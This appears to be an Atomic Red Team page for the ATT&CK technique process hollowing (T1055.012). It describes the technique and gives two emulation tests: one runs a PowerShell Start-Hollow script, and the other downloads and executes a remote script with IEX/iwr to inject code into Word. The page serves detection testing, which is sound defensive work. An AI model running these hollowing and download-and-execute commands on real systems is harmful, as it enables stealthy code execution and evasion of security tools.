Try it using Invoke-Atomic

Process Injection: Process Hollowing

Description from ATT&CK

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)

This is very similar to Thread Local Storage but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

Atomic Tests

Atomic Test #1 - Process Hollowing using PowerShell

This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)

Supported Platforms: windows

auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c

Inputs:

Name Description Type Default Value
hollow_binary_path Path of the binary to hollow (executable that will run inside the sponsor) string C:\Windows\System32\cmd.exe
parent_process_name Name of the parent process string explorer
sponsor_binary_path Path of the sponsor binary (executable that will host the binary) string C:\Windows\System32\notepad.exe
spawnto_process_name Name of the process to spawn string notepad

Attack Commands: Run with powershell!

1
2
3
4
. "$PathToAtomicsFolder\T1055.012\src\Start-Hollow.ps1"
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose

Cleanup Commands:

1
2
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore

Atomic Test #2 - RunPE via VBA

This module executes notepad.exe from within the WINWORD.EXE process

Supported Platforms: windows

auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b

Inputs:

Name Description Type Default Value
ms_product Maldoc application Word string Word

Attack Commands: Run with powershell!

1
2
3
4
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"

Dependencies: Run with powershell!

Description: Microsoft #{ms_product} must be installed

Check Prereq Commands:

1
2
3
4
5
6
7
try {
  New-Object -COMObject "#{ms_product}.Application" | Out-Null
  $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

Get Prereq Commands:

1
2
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"

source